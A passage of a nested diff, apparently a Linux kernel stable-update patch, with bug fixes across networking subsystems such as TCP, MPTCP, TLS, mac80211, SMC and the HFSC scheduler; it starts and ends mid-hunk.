+ 		 * after softirq/tasklet schedule.
+ 		 * This helps when TX completions are delayed too much.
+ 		 */
+-		if (tcp_rtx_queue_empty(sk))
++		if (tcp_rtx_queue_empty_or_single_skb(sk))
+ 			return false;
+ 
+ 		set_bit(TSQ_THROTTLED, &sk->sk_tsq_flags);
+@@ -2735,7 +2747,7 @@ bool tcp_schedule_loss_probe(struct sock *sk, bool advancing_rto)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
+-	u32 timeout, rto_delta_us;
++	u32 timeout, timeout_us, rto_delta_us;
+ 	int early_retrans;
+ 
+ 	/* Don't do any loss probe on a Fast Open connection before 3WHS
+@@ -2759,11 +2771,12 @@ bool tcp_schedule_loss_probe(struct sock *sk, bool advancing_rto)
+ 	 * sample is available then probe after TCP_TIMEOUT_INIT.
+ 	 */
+ 	if (tp->srtt_us) {
+-		timeout = usecs_to_jiffies(tp->srtt_us >> 2);
++		timeout_us = tp->srtt_us >> 2;
+ 		if (tp->packets_out == 1)
+-			timeout += TCP_RTO_MIN;
++			timeout_us += tcp_rto_min_us(sk);
+ 		else
+-			timeout += TCP_TIMEOUT_MIN;
++			timeout_us += TCP_TIMEOUT_MIN_US;
++		timeout = usecs_to_jiffies(timeout_us);
+ 	} else {
+ 		timeout = TCP_TIMEOUT_INIT;
+ 	}
+diff --git a/net/ipv4/tcp_recovery.c b/net/ipv4/tcp_recovery.c
+index 50abaa941387d..c085793691102 100644
+--- a/net/ipv4/tcp_recovery.c
++++ b/net/ipv4/tcp_recovery.c
+@@ -104,7 +104,7 @@ bool tcp_rack_mark_lost(struct sock *sk)
+ 	tp->rack.advanced = 0;
+ 	tcp_rack_detect_loss(sk, &timeout);
+ 	if (timeout) {
+-		timeout = usecs_to_jiffies(timeout) + TCP_TIMEOUT_MIN;
++		timeout = usecs_to_jiffies(timeout + TCP_TIMEOUT_MIN_US);
+ 		inet_csk_reset_xmit_timer(sk, ICSK_TIME_REO_TIMEOUT,
+ 					  timeout, inet_csk(sk)->icsk_rto);
+ 	}
+diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
+index 14ed868680c6a..c2dcb5c613b6b 100644
+--- a/net/ipv6/esp6.c
++++ b/net/ipv6/esp6.c
+@@ -770,7 +770,9 @@ static inline int esp_remove_trailer(struct sk_buff *skb)
+ 		skb->csum = csum_block_sub(skb->csum, csumdiff,
+ 					   skb->len - trimlen);
+ 	}
+-	pskb_trim(skb, skb->len - trimlen);
++	ret = pskb_trim(skb, skb->len - trimlen);
++	if (unlikely(ret))
++		return ret;
+ 
+ 	ret = nexthdr[1];
+ 
+diff --git a/net/ipv6/xfrm6_policy.c b/net/ipv6/xfrm6_policy.c
+index ea435eba30534..f0053087d2e47 100644
+--- a/net/ipv6/xfrm6_policy.c
++++ b/net/ipv6/xfrm6_policy.c
+@@ -118,11 +118,11 @@ static void xfrm6_dst_destroy(struct dst_entry *dst)
+ {
+ 	struct xfrm_dst *xdst = (struct xfrm_dst *)dst;
+ 
+-	if (likely(xdst->u.rt6.rt6i_idev))
+-		in6_dev_put(xdst->u.rt6.rt6i_idev);
+ 	dst_destroy_metrics_generic(dst);
+ 	if (xdst->u.rt6.rt6i_uncached_list)
+ 		rt6_uncached_list_del(&xdst->u.rt6);
++	if (likely(xdst->u.rt6.rt6i_idev))
++		in6_dev_put(xdst->u.rt6.rt6i_idev);
+ 	xfrm_dst_destroy(xdst);
+ }
+ 
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 0167413d56972..ee9f455bb2d18 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1748,7 +1748,8 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 	/* VHT can override some HT caps such as the A-MSDU max length */
+ 	if (params->vht_capa)
+ 		ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+-						    params->vht_capa, link_sta);
++						    params->vht_capa, NULL,
++						    link_sta);
+ 
+ 	if (params->he_capa)
+ 		ieee80211_he_cap_ie_to_sta_he_cap(sdata, sband,
+diff --git a/net/mac80211/ibss.c b/net/mac80211/ibss.c
+index 9dffc30795887..79d2c55052897 100644
+--- a/net/mac80211/ibss.c
++++ b/net/mac80211/ibss.c
+@@ -1068,7 +1068,7 @@ static void ieee80211_update_sta_info(struct ieee80211_sub_if_data *sdata,
+ 						   &chandef);
+ 			memcpy(&cap_ie, elems->vht_cap_elem, sizeof(cap_ie));
+ 			ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+-							    &cap_ie,
++							    &cap_ie, NULL,
+ 							    &sta->deflink);
+ 			if (memcmp(&cap, &sta->sta.deflink.vht_cap, sizeof(cap)))
+ 				rates_updated |= true;
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 27479bbb093ac..99a976ea17498 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -2062,6 +2062,7 @@ void
+ ieee80211_vht_cap_ie_to_sta_vht_cap(struct ieee80211_sub_if_data *sdata,
+ 				    struct ieee80211_supported_band *sband,
+ 				    const struct ieee80211_vht_cap *vht_cap_ie,
++				    const struct ieee80211_vht_cap *vht_cap_ie2,
+ 				    struct link_sta_info *link_sta);
+ enum ieee80211_sta_rx_bandwidth
+ ieee80211_sta_cap_rx_bw(struct link_sta_info *link_sta);
+diff --git a/net/mac80211/mesh_plink.c b/net/mac80211/mesh_plink.c
+index ddfe5102b9a43..bd0b7c189adfa 100644
+--- a/net/mac80211/mesh_plink.c
++++ b/net/mac80211/mesh_plink.c
+@@ -443,7 +443,7 @@ static void mesh_sta_info_init(struct ieee80211_sub_if_data *sdata,
+ 		changed |= IEEE80211_RC_BW_CHANGED;
+ 
+ 	ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+-					    elems->vht_cap_elem,
++					    elems->vht_cap_elem, NULL,
+ 					    &sta->deflink);
+ 
+ 	ieee80211_he_cap_ie_to_sta_he_cap(sdata, sband, elems->he_cap,
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index dc9e7eb7dd857..c07645c999f9a 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -4083,10 +4083,33 @@ static bool ieee80211_assoc_config_link(struct ieee80211_link_data *link,
+ 						  elems->ht_cap_elem,
+ 						  link_sta);
+ 
+-	if (elems->vht_cap_elem && !(link->u.mgd.conn_flags & IEEE80211_CONN_DISABLE_VHT))
++	if (elems->vht_cap_elem &&
++	    !(link->u.mgd.conn_flags & IEEE80211_CONN_DISABLE_VHT)) {
++		const struct ieee80211_vht_cap *bss_vht_cap = NULL;
++		const struct cfg80211_bss_ies *ies;
++
++		/*
++		 * Cisco AP module 9115 with FW 17.3 has a bug and sends a
++		 * too large maximum MPDU length in the association response
++		 * (indicating 12k) that it cannot actually process ...
++		 * Work around that.
++		 */
++		rcu_read_lock();
++		ies = rcu_dereference(cbss->ies);
++		if (ies) {
++			const struct element *elem;
++
++			elem = cfg80211_find_elem(WLAN_EID_VHT_CAPABILITY,
++						  ies->data, ies->len);
++			if (elem && elem->datalen >= sizeof(*bss_vht_cap))
++				bss_vht_cap = (const void *)elem->data;
++		}
++
+ 		ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+ 						    elems->vht_cap_elem,
+-						    link_sta);
++						    bss_vht_cap, link_sta);
++		rcu_read_unlock();
++	}
+ 
+ 	if (elems->he_operation && !(link->u.mgd.conn_flags & IEEE80211_CONN_DISABLE_HE) &&
+ 	    elems->he_cap) {
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 2f9e1abdf375d..2db103a56a28f 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -680,7 +680,8 @@ ieee80211_tx_h_select_key(struct ieee80211_tx_data *tx)
+ 		}
+ 
+ 		if (unlikely(tx->key && tx->key->flags & KEY_FLAG_TAINTED &&
+-			     !ieee80211_is_deauth(hdr->frame_control)))
++			     !ieee80211_is_deauth(hdr->frame_control)) &&
++			     tx->skb->protocol != tx->sdata->control_port_protocol)
+ 			return TX_DROP;
+ 
+ 		if (!skip_hw && tx->key &&
+diff --git a/net/mac80211/vht.c b/net/mac80211/vht.c
+index 803de58814852..f7526be8a1c7e 100644
+--- a/net/mac80211/vht.c
++++ b/net/mac80211/vht.c
+@@ -4,7 +4,7 @@
+  *
+  * Portions of this file
+  * Copyright(c) 2015 - 2016 Intel Deutschland GmbH
+- * Copyright (C) 2018 - 2022 Intel Corporation
++ * Copyright (C) 2018 - 2023 Intel Corporation
+  */
+ 
+ #include <linux/ieee80211.h>
+@@ -116,12 +116,14 @@ void
+ ieee80211_vht_cap_ie_to_sta_vht_cap(struct ieee80211_sub_if_data *sdata,
+ 				    struct ieee80211_supported_band *sband,
+ 				    const struct ieee80211_vht_cap *vht_cap_ie,
++				    const struct ieee80211_vht_cap *vht_cap_ie2,
+ 				    struct link_sta_info *link_sta)
+ {
+ 	struct ieee80211_sta_vht_cap *vht_cap = &link_sta->pub->vht_cap;
+ 	struct ieee80211_sta_vht_cap own_cap;
+ 	u32 cap_info, i;
+ 	bool have_80mhz;
++	u32 mpdu_len;
+ 
+ 	memset(vht_cap, 0, sizeof(*vht_cap));
+ 
+@@ -317,11 +319,21 @@ ieee80211_vht_cap_ie_to_sta_vht_cap(struct ieee80211_sub_if_data *sdata,
+ 
+ 	link_sta->pub->bandwidth = ieee80211_sta_cur_vht_bw(link_sta);
+ 
++	/*
++	 * Work around the Cisco 9115 FW 17.3 bug by taking the min of
++	 * both reported MPDU lengths.
++	 */
++	mpdu_len = vht_cap->cap & IEEE80211_VHT_CAP_MAX_MPDU_MASK;
++	if (vht_cap_ie2)
++		mpdu_len = min_t(u32, mpdu_len,
++				 le32_get_bits(vht_cap_ie2->vht_cap_info,
++					       IEEE80211_VHT_CAP_MAX_MPDU_MASK));
++
+ 	/*
+ 	 * FIXME - should the amsdu len be per link? store per link
+ 	 * and maintain a minimum?
+ 	 */
+-	switch (vht_cap->cap & IEEE80211_VHT_CAP_MAX_MPDU_MASK) {
++	switch (mpdu_len) {
+ 	case IEEE80211_VHT_CAP_MAX_MPDU_LENGTH_11454:
+ 		link_sta->pub->agg.max_amsdu_len = IEEE80211_MAX_MPDU_LEN_VHT_11454;
+ 		break;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 881e05193ac97..0eb20274459c8 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1342,7 +1342,7 @@ alloc_skb:
+ 	if (copy == 0) {
+ 		u64 snd_una = READ_ONCE(msk->snd_una);
+ 
+-		if (snd_una != msk->snd_nxt) {
++		if (snd_una != msk->snd_nxt || tcp_write_queue_tail(ssk)) {
+ 			tcp_remove_empty_skb(ssk);
+ 			return 0;
+ 		}
+@@ -1350,11 +1350,6 @@ alloc_skb:
+ 		zero_window_probe = true;
+ 		data_seq = snd_una - 1;
+ 		copy = 1;
+-
+-		/* all mptcp-level data is acked, no skbs should be present into the
+-		 * ssk write queue
+-		 */
+-		WARN_ON_ONCE(reuse_skb);
+ 	}
+ 
+ 	copy = min_t(size_t, copy, info->limit - info->sent);
+@@ -1383,7 +1378,6 @@ alloc_skb:
+ 	if (reuse_skb) {
+ 		TCP_SKB_CB(skb)->tcp_flags &= ~TCPHDR_PSH;
+ 		mpext->data_len += copy;
+-		WARN_ON_ONCE(zero_window_probe);
+ 		goto out;
+ 	}
+ 
+@@ -2374,6 +2368,26 @@ bool __mptcp_retransmit_pending_data(struct sock *sk)
+ #define MPTCP_CF_PUSH		BIT(1)
+ #define MPTCP_CF_FASTCLOSE	BIT(2)
+ 
++/* be sure to send a reset only if the caller asked for it, also
++ * clean completely the subflow status when the subflow reaches
++ * TCP_CLOSE state
++ */
++static void __mptcp_subflow_disconnect(struct sock *ssk,
++				       struct mptcp_subflow_context *subflow,
++				       unsigned int flags)
++{
++	if (((1 << ssk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)) ||
++	    (flags & MPTCP_CF_FASTCLOSE)) {
++		/* The MPTCP code never waits on the subflow sockets, TCP-level
++		 * disconnect should never fail
++		 */
++		WARN_ON_ONCE(tcp_disconnect(ssk, 0));
++		mptcp_subflow_ctx_reset(subflow);
++	} else {
++		tcp_shutdown(ssk, SEND_SHUTDOWN);
++	}
++}
++
+ /* subflow sockets can be either outgoing (connect) or incoming
+  * (accept).
+  *
+@@ -2411,7 +2425,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
+ 
+ 	if ((flags & MPTCP_CF_FASTCLOSE) && !__mptcp_check_fallback(msk)) {
+-		/* be sure to force the tcp_disconnect() path,
++		/* be sure to force the tcp_close path
+ 		 * to generate the egress reset
+ 		 */
+ 		ssk->sk_lingertime = 0;
+@@ -2421,12 +2435,8 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+-		/* The MPTCP code never wait on the subflow sockets, TCP-level
+-		 * disconnect should never fail
+-		 */
+-		WARN_ON_ONCE(tcp_disconnect(ssk, 0));
++		__mptcp_subflow_disconnect(ssk, subflow, flags);
+ 		msk->subflow->state = SS_UNCONNECTED;
+-		mptcp_subflow_ctx_reset(subflow);
+ 		release_sock(ssk);
+ 
+ 		goto out;
+@@ -3107,12 +3117,6 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	/* Deny disconnect if other threads are blocked in sk_wait_event()
+-	 * or inet_wait_for_connect().
+-	 */
+-	if (sk->sk_wait_pending)
+-		return -EBUSY;
+-
+ 	/* We are on the fastopen error path. We can't call straight into the
+ 	 * subflows cleanup code due to lock nesting (we are already under
+ 	 * msk->firstsocket lock).
+@@ -3180,7 +3184,6 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 		inet_sk(nsk)->pinet6 = mptcp_inet6_sk(nsk);
+ #endif
+ 
+-	nsk->sk_wait_pending = 0;
+ 	__mptcp_init_sock(nsk);
+ 
+ 	msk = mptcp_sk(nsk);
+diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
+index d7de2ecb287eb..f44f2eaf32172 100644
+--- a/net/netfilter/nft_payload.c
++++ b/net/netfilter/nft_payload.c
+@@ -132,7 +132,7 @@ void nft_payload_eval(const struct nft_expr *expr,
+ 
+ 	switch (priv->base) {
+ 	case NFT_PAYLOAD_LL_HEADER:
+-		if (!skb_mac_header_was_set(skb))
++		if (!skb_mac_header_was_set(skb) || skb_mac_header_len(skb) == 0)
+ 			goto err;
+ 
+ 		if (skb_vlan_tag_present(skb)) {
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 2660ceab3759d..e34662f4a71e0 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -568,6 +568,8 @@ static void *nft_rbtree_deactivate(const struct net *net,
+ 				   nft_rbtree_interval_end(this)) {
+ 				parent = parent->rb_right;
+ 				continue;
++			} else if (nft_set_elem_expired(&rbe->ext)) {
++				break;
+ 			} else if (!nft_set_elem_active(&rbe->ext, genmask)) {
+ 				parent = parent->rb_left;
+ 				continue;
+diff --git a/net/nfc/nci/spi.c b/net/nfc/nci/spi.c
+index 0935527d1d12b..b68150c971d0b 100644
+--- a/net/nfc/nci/spi.c
++++ b/net/nfc/nci/spi.c
+@@ -151,6 +151,8 @@ static int send_acknowledge(struct nci_spi *nspi, u8 acknowledge)
+ 	int ret;
+ 
+ 	skb = nci_skb_alloc(nspi->ndev, 0, GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
+ 
+ 	/* add the NCI SPI header to the start of the buffer */
+ 	hdr = skb_push(skb, NCI_SPI_HDR_LEN);
+diff --git a/net/rfkill/rfkill-gpio.c b/net/rfkill/rfkill-gpio.c
+index f5afc9bcdee65..2cc95c8dc4c7b 100644
+--- a/net/rfkill/rfkill-gpio.c
++++ b/net/rfkill/rfkill-gpio.c
+@@ -98,13 +98,13 @@ static int rfkill_gpio_probe(struct platform_device *pdev)
+ 
+ 	rfkill->clk = devm_clk_get(&pdev->dev, NULL);
+ 
+-	gpio = devm_gpiod_get_optional(&pdev->dev, "reset", GPIOD_OUT_LOW);
++	gpio = devm_gpiod_get_optional(&pdev->dev, "reset", GPIOD_ASIS);
+ 	if (IS_ERR(gpio))
+ 		return PTR_ERR(gpio);
+ 
+ 	rfkill->reset_gpio = gpio;
+ 
+-	gpio = devm_gpiod_get_optional(&pdev->dev, "shutdown", GPIOD_OUT_LOW);
++	gpio = devm_gpiod_get_optional(&pdev->dev, "shutdown", GPIOD_ASIS);
+ 	if (IS_ERR(gpio))
+ 		return PTR_ERR(gpio);
+ 
+diff --git a/net/sched/sch_hfsc.c b/net/sched/sch_hfsc.c
+index 61d52594ff6d8..54dddc2ff5025 100644
+--- a/net/sched/sch_hfsc.c
++++ b/net/sched/sch_hfsc.c
+@@ -903,6 +903,14 @@ hfsc_change_usc(struct hfsc_class *cl, struct tc_service_curve *usc,
+ 	cl->cl_flags |= HFSC_USC;
+ }
+ 
++static void
++hfsc_upgrade_rt(struct hfsc_class *cl)
++{
++	cl->cl_fsc = cl->cl_rsc;
++	rtsc_init(&cl->cl_virtual, &cl->cl_fsc, cl->cl_vt, cl->cl_total);
++	cl->cl_flags |= HFSC_FSC;
++}
++
+ static const struct nla_policy hfsc_policy[TCA_HFSC_MAX + 1] = {
+ 	[TCA_HFSC_RSC]	= { .len = sizeof(struct tc_service_curve) },
+ 	[TCA_HFSC_FSC]	= { .len = sizeof(struct tc_service_curve) },
+@@ -1012,10 +1020,6 @@ hfsc_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 		if (parent == NULL)
+ 			return -ENOENT;
+ 	}
+-	if (!(parent->cl_flags & HFSC_FSC) && parent != &q->root) {
+-		NL_SET_ERR_MSG(extack, "Invalid parent - parent class must have FSC");
+-		return -EINVAL;
+-	}
+ 
+ 	if (classid == 0 || TC_H_MAJ(classid ^ sch->handle) != 0)
+ 		return -EINVAL;
+@@ -1066,6 +1070,12 @@ hfsc_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	cl->cf_tree = RB_ROOT;
+ 
+ 	sch_tree_lock(sch);
++	/* Check if the inner class is a misconfigured 'rt' */
++	if (!(parent->cl_flags & HFSC_FSC) && parent != &q->root) {
++		NL_SET_ERR_MSG(extack,
++			       "Forced curve change on parent 'rt' to 'sc'");
++		hfsc_upgrade_rt(parent);
++	}
+ 	qdisc_class_hash_insert(&q->clhash, &cl->cl_common);
+ 	list_add_tail(&cl->siblings, &parent->children);
+ 	if (parent->level == 0)
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index f774d840759d6..4ea41d6e36969 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1187,6 +1187,7 @@ static int smc_connect_rdma_v2_prepare(struct smc_sock *smc,
+ 	struct smc_clc_first_contact_ext *fce =
+ 		(struct smc_clc_first_contact_ext *)
+ 			(((u8 *)clc_v2) + sizeof(*clc_v2));
++	struct net *net = sock_net(&smc->sk);
+ 
+ 	if (!ini->first_contact_peer || aclc->hdr.version == SMC_V1)
+ 		return 0;
+@@ -1195,7 +1196,7 @@ static int smc_connect_rdma_v2_prepare(struct smc_sock *smc,
+ 		memcpy(ini->smcrv2.nexthop_mac, &aclc->r0.lcl.mac, ETH_ALEN);
+ 		ini->smcrv2.uses_gateway = false;
+ 	} else {
+-		if (smc_ib_find_route(smc->clcsock->sk->sk_rcv_saddr,
++		if (smc_ib_find_route(net, smc->clcsock->sk->sk_rcv_saddr,
+ 				      smc_ib_gid_to_ipv4(aclc->r0.lcl.gid),
+ 				      ini->smcrv2.nexthop_mac,
+ 				      &ini->smcrv2.uses_gateway))
+@@ -2322,7 +2323,7 @@ static int smc_listen_find_device(struct smc_sock *new_smc,
+ 		smc_find_ism_store_rc(rc, ini);
+ 		return (!rc) ? 0 : ini->rc;
+ 	}
+-	return SMC_CLC_DECL_NOSMCDEV;
++	return prfx_rc;
+ }
+ 
+ /* listen worker: finish RDMA setup */
+diff --git a/net/smc/smc_ib.c b/net/smc/smc_ib.c
+index 854772dd52fd1..ace8611735321 100644
+--- a/net/smc/smc_ib.c
++++ b/net/smc/smc_ib.c
+@@ -193,7 +193,7 @@ bool smc_ib_port_active(struct smc_ib_device *smcibdev, u8 ibport)
+ 	return smcibdev->pattr[ibport - 1].state == IB_PORT_ACTIVE;
+ }
+ 
+-int smc_ib_find_route(__be32 saddr, __be32 daddr,
++int smc_ib_find_route(struct net *net, __be32 saddr, __be32 daddr,
+ 		      u8 nexthop_mac[], u8 *uses_gateway)
+ {
+ 	struct neighbour *neigh = NULL;
+@@ -205,7 +205,7 @@ int smc_ib_find_route(__be32 saddr, __be32 daddr,
+ 
+ 	if (daddr == cpu_to_be32(INADDR_NONE))
+ 		goto out;
+-	rt = ip_route_output_flow(&init_net, &fl4, NULL);
++	rt = ip_route_output_flow(net, &fl4, NULL);
+ 	if (IS_ERR(rt))
+ 		goto out;
+ 	if (rt->rt_uses_gateway && rt->rt_gw_family != AF_INET)
+@@ -235,6 +235,7 @@ static int smc_ib_determine_gid_rcu(const struct net_device *ndev,
+ 	if (smcrv2 && attr->gid_type == IB_GID_TYPE_ROCE_UDP_ENCAP &&
+ 	    smc_ib_gid_to_ipv4((u8 *)&attr->gid) != cpu_to_be32(INADDR_NONE)) {
+ 		struct in_device *in_dev = __in_dev_get_rcu(ndev);
++		struct net *net = dev_net(ndev);
+ 		const struct in_ifaddr *ifa;
+ 		bool subnet_match = false;
+ 
+@@ -248,7 +249,7 @@ static int smc_ib_determine_gid_rcu(const struct net_device *ndev,
+ 		}
+ 		if (!subnet_match)
+ 			goto out;
+-		if (smcrv2->daddr && smc_ib_find_route(smcrv2->saddr,
++		if (smcrv2->daddr && smc_ib_find_route(net, smcrv2->saddr,
+ 						       smcrv2->daddr,
+ 						       smcrv2->nexthop_mac,
+ 						       &smcrv2->uses_gateway))
+diff --git a/net/smc/smc_ib.h b/net/smc/smc_ib.h
+index 034295676e881..ebcb05ede7f55 100644
+--- a/net/smc/smc_ib.h
++++ b/net/smc/smc_ib.h
+@@ -113,7 +113,7 @@ void smc_ib_sync_sg_for_device(struct smc_link *lnk,
+ int smc_ib_determine_gid(struct smc_ib_device *smcibdev, u8 ibport,
+ 			 unsigned short vlan_id, u8 gid[], u8 *sgid_index,
+ 			 struct smc_init_info_smcrv2 *smcrv2);
+-int smc_ib_find_route(__be32 saddr, __be32 daddr,
++int smc_ib_find_route(struct net *net, __be32 saddr, __be32 daddr,
+ 		      u8 nexthop_mac[], u8 *uses_gateway);
+ bool smc_ib_is_valid_local_systemid(void);
+ int smcr_nl_get_device(struct sk_buff *skb, struct netlink_callback *cb);
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index f2e7302a4d96b..338a443fa47b2 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -96,8 +96,8 @@ void update_sk_prot(struct sock *sk, struct tls_context *ctx)
+ 
+ int wait_on_pending_writer(struct sock *sk, long *timeo)
+ {
+-	int rc = 0;
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
++	int ret, rc = 0;
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	while (1) {
+@@ -111,9 +111,13 @@ int wait_on_pending_writer(struct sock *sk, long *timeo)
+ 			break;
+ 		}
+ 
+-		if (sk_wait_event(sk, timeo,
+-				  !READ_ONCE(sk->sk_write_pending), &wait))
++		ret = sk_wait_event(sk, timeo,
++				    !READ_ONCE(sk->sk_write_pending), &wait);
++		if (ret) {
++			if (ret < 0)
++				rc = ret;
+ 			break;
++		}
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	return rc;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 9be00ebbb2341..2af72d349192e 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -1296,6 +1296,7 @@ tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+ 	struct tls_sw_context_rx *ctx = tls_sw_ctx_rx(tls_ctx);
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
++	int ret = 0;
+ 	long timeo;
+ 
+ 	timeo = sock_rcvtimeo(sk, nonblock);
+@@ -1307,6 +1308,9 @@ tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
+ 		if (sk->sk_err)
+ 			return sock_error(sk);
+ 
++		if (ret < 0)
++			return ret;
++
+ 		if (!skb_queue_empty(&sk->sk_receive_queue)) {
+ 			tls_strp_check_rcv(&ctx->strp);
+ 			if (tls_strp_msg_ready(ctx))
+@@ -1325,10 +1329,10 @@ tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
+ 		released = true;
+ 		add_wait_queue(sk_sleep(sk), &wait);
+ 		sk_set_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+-		sk_wait_event(sk, &timeo,
+-			      tls_strp_msg_ready(ctx) ||
+-			      !sk_psock_queue_empty(psock),
+-			      &wait);
++		ret = sk_wait_event(sk, &timeo,
++				    tls_strp_msg_ready(ctx) ||
++				    !sk_psock_queue_empty(psock),
++				    &wait);
+ 		sk_clear_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 		remove_wait_queue(sk_sleep(sk), &wait);
+ 
+@@ -1851,13 +1855,11 @@ tls_read_flush_backlog(struct sock *sk, struct tls_prot_info *prot,
+ 	return sk_flush_backlog(sk);
+ }
+ 
+-static int tls_rx_reader_lock(struct sock *sk, struct tls_sw_context_rx *ctx,
+-			      bool nonblock)
++static int tls_rx_reader_acquire(struct sock *sk, struct tls_sw_context_rx *ctx,
++				 bool nonblock)
+ {
+ 	long timeo;
+-	int err;
+-
+-	lock_sock(sk);
++	int ret;
+ 
+ 	timeo = sock_rcvtimeo(sk, nonblock);
+ 
+@@ -1867,30 +1869,36 @@ static int tls_rx_reader_lock(struct sock *sk, struct tls_sw_context_rx *ctx,
+ 		ctx->reader_contended = 1;
+ 
+ 		add_wait_queue(&ctx->wq, &wait);
+-		sk_wait_event(sk, &timeo,
+-			      !READ_ONCE(ctx->reader_present), &wait);
++		ret = sk_wait_event(sk, &timeo,
++				    !READ_ONCE(ctx->reader_present), &wait);
+ 		remove_wait_queue(&ctx->wq, &wait);
+ 
+-		if (timeo <= 0) {
+-			err = -EAGAIN;
+-			goto err_unlock;
+-		}
+-		if (signal_pending(current)) {
+-			err = sock_intr_errno(timeo);
+-			goto err_unlock;
+-		}
++		if (timeo <= 0)
++			return -EAGAIN;
++		if (signal_pending(current))
++			return sock_intr_errno(timeo);
++		if (ret < 0)
++			return ret;
+ 	}
+ 
+ 	WRITE_ONCE(ctx->reader_present, 1);
+ 
+ 	return 0;
++}
+ 
+-err_unlock:
+-	release_sock(sk);
++static int tls_rx_reader_lock(struct sock *sk, struct tls_sw_context_rx *ctx,
++			      bool nonblock)
++{
++	int err;
++
++	lock_sock(sk);
++	err = tls_rx_reader_acquire(sk, ctx, nonblock);
++	if (err)
++		release_sock(sk);
+ 	return err;
+ }
+ 
+-static void tls_rx_reader_unlock(struct sock *sk, struct tls_sw_context_rx *ctx)
++static void tls_rx_reader_release(struct sock *sk, struct tls_sw_context_rx *ctx)
+ {
+ 	if (unlikely(ctx->reader_contended)) {
+ 		if (wq_has_sleeper(&ctx->wq))
+@@ -1902,6 +1910,11 @@ static void tls_rx_reader_unlock(struct sock *sk, struct tls_sw_context_rx *ctx)
+ 	}
+ 
+ 	WRITE_ONCE(ctx->reader_present, 0);
++}
++
++static void tls_rx_reader_unlock(struct sock *sk, struct tls_sw_context_rx *ctx)
++{
++	tls_rx_reader_release(sk, ctx);
+ 	release_sock(sk);
+ }
+ 
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 2c79604672062..bf2f1f583fb12 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -1618,7 +1618,7 @@ void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work)
+ 		list_add_tail(&work->entry, &rdev->wiphy_work_list);
+ 	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
+ 
+-	schedule_work(&rdev->wiphy_work);
++	queue_work(system_unbound_wq, &rdev->wiphy_work);
+ }
+ EXPORT_SYMBOL_GPL(wiphy_work_queue);
+ 
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 1d993a490ac4b..b19b5acfaf3a9 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -8289,7 +8289,7 @@ static int nl80211_update_mesh_config(struct sk_buff *skb,
+ 	struct cfg80211_registered_device *rdev = info->user_ptr[0];
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+-	struct mesh_config cfg;
++	struct mesh_config cfg = {};
+ 	u32 mask;
+ 	int err;
+ 
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index e5c1510c098fd..b7e1631b3d80d 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -876,6 +876,10 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
